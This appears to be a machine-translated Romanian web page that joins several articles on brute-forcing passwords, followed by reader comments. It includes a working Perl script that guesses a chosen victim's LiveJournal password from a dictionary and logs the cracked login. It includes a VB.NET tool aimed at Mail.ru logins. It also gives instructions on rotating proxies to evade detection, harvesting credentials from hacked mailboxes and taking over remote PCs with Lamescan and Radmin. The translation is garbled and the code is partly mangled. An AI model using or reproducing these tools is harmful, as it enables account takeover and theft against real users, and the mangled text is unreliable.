Acasă - Windows
Recuperarea parolei în forță brută. Ce este forța brută a contului? Care este diferența dintre o brută și o damă?

Toată lumea știe cum au devenit lucrurile în ultima vreme
Resursa populară este livejournal.com sau pur și simplu LiveJournal.
Crearea unui cont în acest sistem este departe de a fi ușor.
Doar. Fie trebuie să plătești cheia, fie
întrebați-l de la prietenii dvs. de pe LiveJournal.

Există un proverb celebru: decât
a cerși și a te umili este mai bine<вырезано
cenzura> si taci :). Prin urmare, astăzi noi
vom scrie forța brută, ceea ce este ușor
va rupe mâinile unor LiveJournal american
rahat :). Desigur că trebuie să alegi
o victimă care a trimis câteva mesaje după
înregistrare, și apoi a dispărut în apă, apoi
Tocmai l-am postat pe livejournal. Astfel de
există o mulțime de conturi și pot fi găsite fără
Probleme.

Deci, să revenim la ideea noastră. Noi primii
trebuie să știi cum să te autentifici
sistem. Mergând la www.livejournal.com/login.bml vom vedea
în colțul din dreapta sus există o formă mică pentru
log in Nu, nu judec despre cel mare din mijloc
ecran. După ce m-am uitat la codul html pe care l-am ales
mic. Cert este că în această formă totul
doi parametri, spre deosebire de cel complet. Al nostru
forța brută viitoare trebuie să transmită cel puțin
date pentru o eficiență ridicată, prin urmare
Să ne concentrăm pe această matriță.

Formularul are doi parametri: utilizator și parolă. Eu insumi
scriptul poate deveni opțional
parametru de mod, a cărui valoare este „login”.
Aparent, la trecerea utilizatorului și a parolei, sistemul
presupune autorizare. Nerăbdător
tastând linkul http://www.livejournal.com/login.bml?user=fuck&password=fucked în browser
(desigur, toate numele au fost schimbate în scopul
conspirație :)), am primit o întoarcere.
Sistemul a fost proiectat doar pentru metoda POST.
Dar sunt o persoană persistentă și nici măcar nu am putut rezista
aceasta protectie:].

Următorul pas a fost restabilirea memoriei
în ceea ce priveşte funcţionarea metodei POST. Pentru el
este relevant transferul următoarelor cerințe obligatorii
parametrii pentru server:

POST
Gazdă
Conținut-Lungime

de fapt o postare :)

După ce am schițat aproximativ o cerere pentru
server, am primit următoarele:

POST /login.bml HTTP/1.1
Gazdă: www.livejournal.com
Tip de conținut: application/x-www-form-urlencoded
Lungimea conținutului: 26

utilizator=la naiba&parola=la naiba

În mod ciudat, nu a funcționat :). Sistem
blestemat la parola greșită. Am crezut,
Există o verificare pentru Referer și UserAgent, dar am făcut o greșeală.
La înlocuirea parametrilor falși
serverul a returnat și răspunsul - Parolă incorectă. Cum
s-a dovedit dacă ai pus-o după parolă
simbol & și crește lungimea liniei cu
unul, apoi serverul a mâncat cu succes datele și
a returnat Conectat.

Chiar nu vroiam să iau totul.
linie HTML lungă și tăiați o linie din ea
Conectat. Am vrut să mă limitez la o redresare modestă
un kilobyte de date :). Era posibil
deoarece serverul a pus cookie-uri în liniile de antet.
Dacă răspunsul a avut succes, aceste cookie-uri au conținut
nume de utilizator și parolă criptată,
aproximativ în acest format:

Set-Cookie: ljsession=ws:fuck:1:fDjwfWdsC; cale=/; Numai Http

Nimic nu ne-a împiedicat să verificăm dacă antetul conține
nume de utilizator și dacă există unul, opriți
forță brută și scrieți în contul de jurnal.

În teorie, a fost scrisă forța brută. Stânga
pune această chestiune în practică. eu
Am folosit Perl pentru codare pentru că îl știu
limba este deja la al treilea an și se potrivește perfect
pentru ideile mele. Căutând șurubul meu
șablon brute force, am găsit un MIME brute force pentru conturile httpd,
pe care am descris-o cândva pe acest site :).
După ce l-am schimbat puțin, am primit un complet
Forța brută LiveJournal. Singurul său dezavantaj
este cu un singur fir, dar pentru asta
un programator tare ca tine, nu cred că se va întâmpla
problema mare :). Rămâne pentru tine
implementați multithreading sau
folosește versiunea mea demo ;).

Deci, codul real:

#!/usr/bin/perl
utilizați IO::Socket; ## Folosind prize
$|++; ## Creştere
tamponează

$server="www.livejournal.com"; ##
Noi am stabilit
Server
$port="80"; ## Și
port :)

$logfile="cracked.log"; ##
Aici
scrierea unui cont piratat

$words="bigdict.txt"; ## Al nostru
un dicționar mare care ghidează
forta bruta

$user="la naiba"; ## Utilizator,
pe care o spargem

$dir="/login.bml"; ## scenariu,
care returnează starea

deschide(fișier, „$cuvinte”) sau imprimă „$!\n”;
@date= ;
$total=@date;
închideți fișierul; ##
Să deschidem
dicționar, scrieți toate cuvintele într-o matrice

foreach $pass (@date) ( ##
Merge cu bicicleta
fiecare cuvant

$i++;
chomp($trece);
$socket=IO::Socket::INET->new(PeerAddr => $server,
PeerPort => $port,
Proto => tcp)
sau imprimați „Imposibil de conectat la $server:$port\n”; ##

Creați o conexiune la livejournal.com

$socket->autoflush(1); ##

Am întrerupt tamponarea (pentru orice eventualitate, pentru că...
din cauza implicită este tăiat)

$post="user=$user&password=$pass&"; ##

Formarea unei cereri POST

$len=lungime($post);
$len+=1; ##
Aflarea lungimii
interogare (expresie + \r\n)

print $socket "POST $dir HTTP/1.1\r\n";
print $socket "Gazda: www.livejournal.com\r\n";;
print $socket "Content-Type: application/x-www-form-urlencoded\r\n";
print $socket "Conexiune: Închide\r\n";
print $socket "Lungimea continutului: $len\r\n";
print $socket "\r\n$post\r\n";

## Trimite la priză
antet lung

$socket->recv($răspuns,1024); ## ȘI
read return = 1 KB de date

dacă ($răspuns=~/\:$utilizator\:/) (
deschide(logf, ">>$logfile") sau imprimă "$!\n";
print logf "$user:$pass is OK!!!\n";
închide logf;
print "$user:$pass este OK!!!\n";
ieșire 0; ## Dacă conține
o linie de genul:user: - scrieți un jurnal și completați jurnalul.

} ## În caz contrar, să verificăm
următoarea parolă

}

Aceasta este de fapt întreaga forță brută. Verificat
Pentru mine personal, funcționează ca un farmec :). Dar conturi
Nu ți-l dau să verifici - sunt lacom ;), testi
pe cont propriu. După cum puteți vedea, totul este ușor de implementat,
dacă vrei doar.

Forța brută (derivată din expresia engleză: forța brută) este un tip de atac al hackerilor - o metodă de a pirata conturi în sisteme informatice, servicii de plată/bancare și site-uri web prin selectarea automată a combinațiilor de parole și autentificare.

Forța brută se bazează pe metoda matematică cu același nume (forța brută), în care soluția corectă - un număr finit sau combinație simbolică - se găsește prin căutarea prin diferite opțiuni. De fapt, fiecare valoare dintr-un set dat de răspunsuri potențiale (soluții) este verificată pentru corectitudine.

Cum funcționează forța brută

Un hacker scrie un program special pentru a ghici parolele sau folosește o soluție gata făcută de la colegii săi. Poate fi direcționat către un anumit serviciu de e-mail, site web, rețea socială (adică este destinat să pirateze o anumită resursă). În continuare, se efectuează pregătirile pentru hacking. Se compune din următoarele etape:

  1. Întocmirea unei liste de proxy

Pentru a ascunde adevărata adresă IP a computerului de pe care va fi efectuat atacul și pentru a preveni blocarea site-ului unde trebuie piratat contul, se configurează o conexiune la Internet printr-un server proxy.

Căutarea adreselor/porturilor proxy se efectuează în Proxy Grabber. Acest utilitar preia independent toate datele pentru conectarea la servere intermediare de pe site-urile care furnizează proxy (sunt specificate în listă). Cu alte cuvinte, se colectează un proxy.

Baza de date rezultată este salvată într-un fișier text separat. Și apoi toate adresele de server conținute în acesta sunt verificate pentru funcționalitate în verificatorul proxy. Destul de des, programele concepute pentru extragerea automată de proxy combină atât funcțiile unui grabber, cât și ale unui verificator.

Ca rezultat, obțineți o listă de proxy gata făcută sub forma unei liste de IP/port, salvată într-un fișier txt. (Veți avea nevoie de el când configurați programul de forță brută).

  1. Căutați baze pentru Brute

Trebuie să conectați un dicționar la forța brută - un anumit set de combinații de parole și autentificare - pe care îl va înlocui în formularul de conectare. Ea, ca și lista proxy, are forma unei liste într-un fișier text obișnuit (.txt). Dicționarele, cunoscute și ca baze de date, sunt distribuite prin forumuri de hackeri, site-uri web și servicii de găzduire a fișierelor. „Meșteri” mai experimentați le creează singuri și le oferă tuturor contra cost. Cu cât baza este mai mare (număr de combinații, autentificări, conturi), cu atât mai bine (pentru hacker) - cu atât este mai mare probabilitatea de succes a hackingului.

  1. Stabilirea forței brute

Lista proxy este încărcată; programul de selecție va schimba automat proxy-ul astfel încât serverul web să nu detecteze atacul și, în consecință, sursa (gazdă) atacului.

Este conectat un dicționar de combinații de parolă/login. Numărul de fire este setat - câte combinații va verifica forța brută în același timp. Un computer puternic cu viteză mare de internet poate gestiona cu încredere 120-200 de fluxuri (aceasta este valoarea optimă). Viteza brutei depinde direct de această setare. De exemplu, dacă setați doar 10 fire, selecția va fi foarte lentă.

  1. A alerga cu forța brută

Programul înregistrează încercările de hacking reușite: salvează conturile conectate (parolă/login) într-un fișier. Durata procedurii de selecție variază de la câteva ore la câteva zile. Cu toate acestea, nu se dovedește întotdeauna eficient din cauza puterii criptografice ridicate a datelor de conectare sau a implementării altor măsuri de protecție de către atacator.

Tipuri de forță brută

Hacking personal

Vânătoare pentru un anumit cont - pe o rețea socială, pe un serviciu de e-mail etc. Prin sau în procesul de comunicare virtuală, atacatorul extrage de la victimă un login pentru a accesa un site web. Apoi sparge parola folosind metode de forță brută: folosește forța brută pentru a indica adresa resursei web și autentificarea obținută și conectează dicționarul.

Șansele unui astfel de hack sunt mici, de exemplu, în comparație cu același atac XSS. Poate avea succes dacă proprietarul contului a folosit o parolă de 6-7 caractere cu o combinație simplă de simboluri. În caz contrar, „rezolvarea” variantelor mai stabile de 12, 15, 20 de litere, numere și caractere speciale va dura ani - zeci și sute de ani, pe baza calculelor formulei de căutare matematică.

Brut/cec

O bază de date cu date de conectare/parole din cutiile poștale ale unui serviciu de e-mail (de exemplu, mail.ru) sau ale altora diferite este conectată la forța brută. Și o listă de proxy - pentru a masca nodul (din moment ce serviciile web de e-mail detectează rapid un atac bazat pe mai multe solicitări de la o adresă IP).

Opțiunile brutei indică o listă de cuvinte cheie (de obicei nume de site) - repere după care va căuta informații de autentificare pe cutiile poștale piratate (de exemplu: steampowered, worldoftanks, 4game, VK). Sau o anumită resursă de internet.

Când se înregistrează într-un joc online, rețea socială sau forum, un utilizator, așa cum era de așteptat, își indică adresa de e-mail (căsuța poștală). Serviciul web trimite un mesaj la adresa specificată cu informații de conectare și un link pentru a confirma înregistrarea. Aceste litere sunt pe care forța brută le caută pentru a extrage date de conectare și parole din ele.

Faceți clic pe „START” și programul de cracare începe cu forța brută. Funcționează conform următorului algoritm:

  1. Încarcă login/parola pentru e-mail din baza de date.
  2. Verifică accesul sau „verifică” (se autentifică automat): dacă este posibil să te autentifici în cont, acesta adaugă unul în coloana bună (asta înseamnă că a fost găsit un alt e-mail de serviciu) și începe să-l vizualizeze (vezi următoarele puncte ); dacă nu există acces, îl intră ca rău.
  3. În toate „beep-urile” (e-mailuri deschise), forța brută scanează scrisorile conform solicitării specificate de hacker - adică caută login-uri/parole pentru site-urile și sistemele de plată specificate.
  4. Când datele necesare sunt găsite, le copiază și le scrie într-un fișier separat.

Astfel, are loc o „deturpare” masivă a conturilor - de la zeci la sute. Atacatorul dispune de „trofeele” obținute la propria discreție - vânzare, schimb, colectare de date, furt de bani.

Hacking computer la distanță

Forța brută, împreună cu alte utilitare de hacker, este folosită pentru a obține acces de la distanță la computerul victimei protejat prin parolă prin intermediul unui canal de internet.

Acest tip de atac constă din următoarele etape:

  1. Se efectuează o căutare a rețelelor IP în care va fi efectuat atacul asupra computerelor utilizatorilor. Intervalele de adrese sunt preluate din baze de date speciale sau prin programe speciale, cum ar fi IP Geo. În el puteți selecta rețele IP pentru un anumit district, regiune și chiar oraș.
  2. Intervalele IP selectate și dicționarele de selecție sunt setate în setările forței brute Lamescan (sau analogului său), destinate login/parolă de la distanță brute force. Odată lansat, Lamescan face următoarele:
  • realizează o conexiune la fiecare IP dintr-un interval dat;
  • după stabilirea unei conexiuni, încearcă să se conecteze la gazdă (PC) prin portul 4899 (dar pot exista și alte opțiuni);
  • dacă portul este deschis: încearcă să obțină acces la sistem, atunci când i se cere o parolă, efectuează ghicit; dacă reușește, salvează adresa IP a gazdei (calculatorului) și informațiile de conectare în baza sa de date.

  1. Hackerul lansează utilitarul Radmin, conceput pentru a gestiona computerele la distanță. Setează coordonatele rețelei victimei (IP, autentificare și parolă) și obține control deplin asupra sistemului - desktop (afișat vizual pe afișajul computerului atacatorului), directoare de fișiere, setări.

Programe pentru Brutus

Forța brută clasică, una dintre primele. Cu toate acestea, nu își pierde relevanța și concurează cu soluții noi. Are un algoritm rapid de forță brută și acceptă toate protocoalele Internet majore - TCP/IP, POP3, HTTP etc. Poate falsifica cookie-uri. Bruteste dicționarul și generează parole în mod independent.

Puternic verificator brut. Echipat cu un arsenal extins de funcții pentru lucrul cu baze de date (verificare, sortare după domeniu). Acceptă diferite tipuri de proxy și verifică funcționalitatea acestora. Scanează scrisorile din cutiile poștale pe baza setărilor precum data, cuvântul cheie, adresa, mesajele necitite. Poate descărca scrisori de pe Mail.ru și Yandex.

Appnimi Password Unlocker

Un program pentru forțarea brută a unei parole pentru un fișier de pe un computer local. Un fel de cal de bataie. Versiunea gratuită a programului vă permite să selectați parole de cel mult 5 caractere. Puteți citi despre cum să instalați și să utilizați Appnimi Password Unlocker



În jocuri, rețele sociale etc., care au fost obținute ilegal, adică piratate sau furate. Desigur, ce este o brută și cum funcționează este destul de greu de înțeles, dar vom încerca să o facem. Dar mai întâi, să ne dăm seama cum să evităm să devenim următoarea victimă a atacatorilor.

Ce este forța brută și cum să te protejezi de ea

Deci, există un software special care vă permite să găsiți parolele corecte pentru login-urile existente, e-mailurile etc. selectând combinații de numere și litere. Desigur, există o serie de caracteristici în funcționarea unor astfel de programe. De exemplu, cu cât parola este mai lungă și mai complexă, cu atât va dura mai mult pentru a o sparge și lucrurile pot ajunge la punctul în care forța brută va eșua. În ceea ce privește timpul, foarte mult depinde de puterea de calcul a echipamentului și de conexiunea la Internet. Deci, procesul poate dura de la câteva minute și poate dura până la o zi sau mai mult.

Probabil că înțelegeți deja ce este forța brută a contului. În ceea ce privește securitatea, după cum sa menționat mai sus, este recomandabil să setați o parolă greu de reținut. De exemplu, RKGJH4hKn2. Este sigur să spunem că hacking-ul va fi destul de problematic. În plus, trebuie să rețineți că, de exemplu, multe litere identice nu dau niciun efect, la fel ca și numerele. Totul trebuie confuz și amestecat, este indicat să alternați literele mari și mici.

Ce este o bază brută?

Desigur, programul nu va funcționa dacă nu există date. Deci, dacă nu are din ce să ghicească parolele, atunci nu va face asta. O bază de date este un set de parole și autentificări. Cu cât această listă este mai extinsă, cu atât este mai mare șansa ca contul să fie spart. Depinde mult de ce combinații sunt prezente în el, adică cu cât este compus mai competent, cu atât mai bine. De asemenea, merită remarcat faptul că baza de date include nu numai parole, ci și login-uri, deoarece brute force, care înseamnă „forță brută” în engleză, le poate selecta simultan pe ambele.

Este de remarcat faptul că fișierul în sine în care sunt stocate toate înregistrările este destul de mare. Lungimea minimă a combinației este de 3 litere și cifre, cea maximă este de 8-16, în funcție de program și versiunea acestuia. Selecția începe cu litera „A” și se termină cu ultima literă a alfabetului englez sau rus. Acestea sunt în esență toate informațiile din bazele de date care vă pot fi utile.

Cine are nevoie de asta și de ce?

Este dificil să răspunzi la această întrebare fără ambiguitate. Oamenii încearcă să pirateze conturile din mai multe motive. Ar putea fi doar pentru distracție, o dorință de a citi scrisorile altora, de a trimite mesaje nevalide etc. Chestia este că acest lucru este ilegal. În plus, poate fi considerat un adevărat furt și trebuie să răspunzi pentru asta. Nu este recomandat să faci astfel de lucruri, mai ales că uneori este o pierdere de timp.

Chiar dacă contul dvs. este piratat, acesta poate fi restaurat rapid și ușor. Acest lucru este deosebit de ușor de făcut dacă ați furnizat date reale la înregistrare. În ceea ce privește conturile create în grabă, recuperarea lor va fi mult mai dificilă. Dar, după cum arată practica, astfel de conturi nu sunt apreciate de hackeri. Nu are rost să luăm contul sau poșta cuiva care nu are nimic util și nu este nevoie să mai vorbim despre asta.

Cine face forța brută?

Nu ar fi de prisos să spunem că acest lucru este făcut de așa-numiții hackeri. Acest lucru se aplică hackurilor la scară largă. În general, astfel de oameni își câștigă existența din asta și o fac cu foarte multă pricepere. Și schema funcționează după cum urmează. Folosind forța brută, sunt selectate autentificări și parole (un anumit număr), iar apoi totul este vândut cu ridicata clienților. Adică, hackerii înșiși nu folosesc practic ceea ce au obținut ilegal, ci pur și simplu îl vând. Dar cine este cumpărătorul, vă întrebați?

Ar putea fi oricine. Singurul lucru care se poate spune este că sunt angajați în achiziționarea unui număr mare de conturi. Aceste conturi sunt apoi vândute utilizatorilor obișnuiți, care sunt apoi surprinși că s-au întors la proprietarul inițial. Același lucru este valabil și pentru datele personale ale sistemelor de plată (Webmoney, Qiwi). Pe lângă faptul că există posibilitatea de a obține o anumită sumă de fonduri, un astfel de cont poate fi vândut, acest lucru este valabil mai ales în cazurile în care există certificate scumpe care confirmă competența proprietarului.

Câteva despre serverele proxy pentru forța brută

Orice hacker care se respectă se gândește în primul rând cum să se protejeze. Și din moment ce ceea ce face este complet ilegal, trebuie acordată o atenție deosebită acestui lucru. Știm deja ce este o forță brută și acum aș dori să vă spun cum funcționează un server proxy. Vă va permite să rămâneți nedetectat în timpul piratarii contului. Cu cuvinte simple, adresa IP rămâne necunoscută. Aceasta este principala protecție pentru persoanele care pirata conturile altor persoane.

Dar asta nu este tot. După ce contul a fost spart, trebuie să vă conectați la el. Dar chiar și cu numele de utilizator și parola corecte, uneori acest lucru nu este ușor de făcut. De exemplu, schimbarea adresei IP implică trimiterea unui cod de securitate către e-mailul sau telefonul dvs., un astfel de sistem este utilizat cu succes de Valve, în special pentru a-și proteja produsul numit Steam; Desigur, pentru Brutus a devenit deja clar. Prin urmare, ne putem conecta la orice cont și nu stârnim deloc suspiciuni, ceea ce face crima perfectă.

Nu este nevoie să repeți încă o dată că parola ar trebui să fie lungă și complexă. De asemenea, nu este recomandat să vă folosiți contul în locuri aglomerate sau la serviciu, unde oricine poate folosi un computer sau un laptop. În primul rând, poate fi folosit un program de spionaj special care își amintește ce taste au fost apăsate, după cum înțelegeți, nu va fi dificil să aflați parola;

Dar asta nu este tot ce trebuie să știi. Este indicat să nu vă amintiți parola în browser, deoarece poate fi interceptată. Există conturi în care, la autentificare, primiți imediat un SMS cu un cod de confirmare pe telefonul mobil. Prin urmare, dacă ajunge și nu aveți nimic de-a face cu el, atunci schimbați parola și este indicat să acționați cât mai repede posibil.

Care este diferența dintre o brută și o damă?

Deci, să ne dăm seama acum care este diferența dintre aceste două concepte. Deci, am decis deja că forța brută vă permite să selectați o autentificare și o parolă prin simpla căutare din dicționar (bază). Să ne uităm la un exemplu de piratare a unui serviciu de e-mail. De exemplu, am obținut acces, dar ce să facem în continuare? De regulă, ne interesează informații despre conturile de pe rețelele de socializare, jocuri online, sisteme de plată etc. Așadar, verificatorul verifică parola de e-mail pe care o avem deja pentru potriviri.

Cu cuvinte simple, dacă se potrivește, de exemplu, cu cel instalat pe VKontakte, atunci îl vom recunoaște imediat. Putem concluziona că acest lucru ne va lipsi de dureri de cap inutile. În consecință, procesul este mai automatizat și practic nu necesită participarea noastră. Acum știți ce sunt brute și checker și cum funcționează aceste programe.

Concluzie

Pe baza celor de mai sus se pot trage anumite concluzii. Contul trebuie utilizat numai pe un computer personal, atunci când accesul persoanelor neautorizate este exclus. Același lucru este valabil și pentru conexiunile la Wi-Fi gratuit, deoarece există posibilitatea de interceptare a fluxului de date și furtul ulterior al contului dvs. Din moment ce știi deja, Brute, îți va fi mult mai ușor să te aperi. După cum se spune, cel care este conștient este antebrat. Amintiți-vă că cât de bine este protejat contul dvs. depinde doar de dvs. Dacă ați făcut totul corect, atunci nu trebuie să vă faceți griji din nou și este puțin probabil să aveți nevoie să știți ce este forța brută a contului și nuanțele modului în care funcționează programul.

Salutare tuturor! În sfârșit am găsit timp să scriu un articol lung.

În ea vă voi arăta cum să scrieți BruteForce (colocvial „brut”).

1) Puțină istorie

La începutul anului, am început să caut informații despre scrierea în forță brută pe Internet.

Era foarte puțin, chiar a trebuit să traduc ceva din spaniolă =)).

Dar nu am renunțat și mi-am continuat căutarea, iar în urmă cu două luni mi-am dat seama de toate și am scris o simplă forță brută cu un singur fir. Dar era departe de „giganți” precum „Brutus AET2”. Am început să caut informații despre multithreading, iar căutarea mea a fost încununată de succes. Acum toate informațiile au fost strânse și scriu acest articol pentru ca cei care au decis să scrie o forță brută să nu fie nevoiți să se târască prin colțurile rețelei, adunând informații.

2) Teorie

În povestea mea anterioară, am menționat cuvântul forță brută de mai multe ori. Ce este?

Vă voi arăta cu un exemplu: Să presupunem că ați uitat parola de e-mail (apropo, acest lucru se întâmplă destul de des).

Puteți încerca să vă recuperați parola printr-o întrebare de securitate sau un telefon mobil, dar dacă nu aveți un telefon mobil, iar întrebarea de securitate spune „Câți dinți sunt pe laba dreaptă a pisicii mele?”

Ce să faci atunci? Așa este, încercați să ghiciți parola. Dar cum??? Manual?? Bineînțeles că nu, pentru asta a fost creată forța brută, pentru a face forța brută pentru tine.

Principiul de funcționare este simplu: indicăm e-mailul nostru și conectăm o listă de parole. Faceți clic pe Începeți și treceți la afacerea dvs. Când parola corectă este găsită, forța brută o va afișa pe ecran.

Totul ar fi bine, dar dacă am avea un milion de parole în dicționarul nostru? Brutus va trimite un milion de cereri către server, iar serverul va crede că încercăm să piratam căsuța poștală a altcuiva și pur și simplu ne va bloca adresa IP. Cum atunci?

În acest scop, sunt furnizate servere proxy. Nu vă spun despre ce este vorba, deoarece este un subiect destul de larg. Puteți citi despre proxy. Pe scurt: proxy-urile ne vor schimba IP-ul și căutarea va continua.

Ultimul punct al teoriei este modurile de căutare.

Există doar două dintre ele: cu un singur fir și cu mai multe fire.

În modul cu un singur thread, forța brută ia prima parolă și așteaptă un răspuns de la server. Când se primește răspunsul, este nevoie de următoarea parolă etc.

În modul cu mai multe fire, forța brută creează multe fire. În fiecare dintre ele, apare forța brută, adică forța brută nu trebuie să aștepte ca răspunsul de la server să continue. Pur și simplu creează următorul thread și căutarea continuă.

Exemplu: decideți să descărcați un film prin torrent. Ați găsit un fișier torrent și ați început descărcarea. În timp ce descărcarea este în curs, de exemplu, ați mers la Contact și ați corespondat cu prietenii. Într-un fir rulează browserul, în altul torrentul descarcă cu sârguință un film, iar în al treilea antivirusul scanează sistemul etc.

Sper că am explicat clar.

2) Practică mult așteptată

În timp ce scriem o simplă forță brută cu un singur fir (pentru a nu ne supraîncărca creierul), iar în a doua parte, voi vorbi despre crearea unei forțe brute cu mai multe fire și schimbarea

proxy + voi furniza părțile mele din cod pe care le puteți utiliza în proiectele dvs.

Asa de! Merge.

Deschideți VB.NET, creați un proiect obișnuit și faceți ceva de genul acesta:

Acum trebuie să ne hotărâm cu privire la server și să „adulmecăm” cererile.

Vă voi arăta folosind Mail.ru ca exemplu:

Folosind-o, vom vedea cum are loc autorizarea pe server.

2) Lansați versiunea autonomă a programului: 3

3) Accesați e-mailul Mail.ru și introduceți datele, dar nu vă conectați încă:

4) În HttpAnalyzer, faceți clic pe pauză.

Ne întoarcem la Mail Mail și facem clic pe Conectare.

Acum să revenim la sniffer. Observăm următoarele:

Solicitarea POST pentru scriptul de autorizare este evidențiată cu albastru.

Să vedem ce date sunt trimise:

Autentificare - Autentificare

Domeniu - Domeniu

Parolă - Parolă

Saveauth - Trebuie să ne salvăm datele (nu sunt sigur exact)

Nu pot spune nimic despre ultimul parametru, dar nu avem nevoie de el :n =)

Să încercăm să trimitem o cerere:

Dacă totul este introdus corect, vei ajunge la e-mailul tău.

Dacă nu, veți vedea un mesaj de eroare de conectare.

Pentru a face acest lucru, accesați fila Cookies. Suntem interesați de partea dreaptă:

Vedem că sunt create două cookie-uri: Mpop și t.

„Set - Cookie” - câmp de antet trimis către server.

6) Acum să introducem datele din stânga și să analizăm rezultatul.

Vedem că cookie-urile nu sunt create.

Grozav! Acum știm cum să scriem forța brută:

Mai întâi, să declarăm o matrice în care vom plasa parolele din dicționar:

Public PassList ca nouă ArrayList

Cod pentru butonul „...” (trei puncte):

Dim f As New OpenFileDialog "Creați un nou fișier de dialog deschis dacă f.ShowDialog = Windows.Forms.DialogResult.OK și f.FileName<>"" Apoi " Dacă utilizatorul a selectat o listă, atunci PassList.AddRange(IO.File.ReadAllLines(f.FileName)) " Citiți toate parolele în matrice txtPassList.Text=f.FileName " Afișați calea către fișier în caseta text End If

Acum codul pentru butonul Start căutare:

Dacă txtLogin.Text<>"" Apoi " Dacă ați introdus o autentificare, atunci Dim i As Integer = 0 " Declarați un contor pentru a căuta i = 0 To PassList.Count - 1 " Căutați în timp ce există parole System.Threading.Thread.Sleep(1000) Dim Solicitare ca net. HttpWebRequest = Net.HttpWebRequest.Create("http://win.mail.ru/cgi-bin/auth?Login=" & txtLogin.Text & "&Domain=" & Split(txtLogin.Text, "@ ")(1 ) _ & "&Password=" & PassList(i)) " Formează o solicitare Dim Response As Net.HttpWebResponse "Metoda de transfer de date: Request.Method = "POST" "Interzice tranzițiile automate Request.AllowAutoRedirect = False "Trimite o cerere Response = Request.GetResponse "Verificați cookie-urile dacă Response.Headers("Set-Cookie").IndexOf("Mpop") = 0 Apoi " Dacă există un cookie Mpop, atunci MsgBox ("Parola selectată: " + PassList( i)) " Afișează parola corectă Ieșire Sub " Termină căutarea Sfârșit dacă Următorul Sfârșit dacă

Dacă ceva nu este clar, scrieți-mi. Voi lăsa mai jos datele mele de contact.

Facem un dicționar de parole precum:

[aici este parola corectă]

234411dsdfd

Copiați și schimbați textul roșu în parola dvs.

Conectăm totul la program:

Faceți clic pentru a începe căutarea.

Dacă vedeți fereastra Parola a fost selectată, atunci totul funcționează.

P.S Scuze pentru greșelile de scriere.

P.P.S Dacă ceva nu este clar, atunci scrie. Mereu bucuros să ajut!


Comentarii ()

Kulkhatsker

iti dau codul!!! Ce naiba de oameni sunt?!

XeoN

Ce il face sa iasa in evidenta??

Kulkhatsker

Deci, transferat pe VB.NET. La naiba, toată lumea scrie totul pentru hacking, așa că dacă doar l-ar scrie, ar încerca să evidențieze și codul!

O cerere uriașă către generațiile următoare: NU SELECTAȚI CODUL!!!

Artyom

ești o mega-putere proastă

sursă link

Măcar postați sursa

DikusarKolia

Lecție foarte utilă :) Am făcut totul în Visual Basic 2008, deși am editat-o ​​puțin

 


Citit:



Depanarea problemelor mouse-ului

Depanarea problemelor mouse-ului

Oh computerele astea, întotdeauna există ceva de făcut. În vremurile când în locul internetului existau BBS (Bulletin Board System), înlocuindu-le pe cele actuale...

Cum să setați și să configurați un memento pe iPhone Cum să setați un memento pe iPhone 8

Cum să setați și să configurați un memento pe iPhone Cum să setați un memento pe iPhone 8

Una dintre cele mai vechi caracteristici ale iPhone-ului, pe care nu o folosește toți proprietarii gadgetului, este o amintire a zilelor de naștere și a unor date memorabile...

Cum să introduceți contul personal al personalului militar fără înregistrare - instrucțiuni

Cum să introduceți contul personal al personalului militar fără înregistrare - instrucțiuni

Un angajat are astăzi posibilitatea de a utiliza o resursă convenabilă și oficială pe Internet, care îi va permite să vizualizeze rapid următoarele date:...

Biroul militar intrare personală fără înregistrare, după număr personal

Biroul militar intrare personală fără înregistrare, după număr personal

Începând de la jumătatea anului 2012, foaia de plată, cu alte cuvinte, toți banii transferați către militar este afișat în secțiunea corespunzătoare pe...

feed-image RSS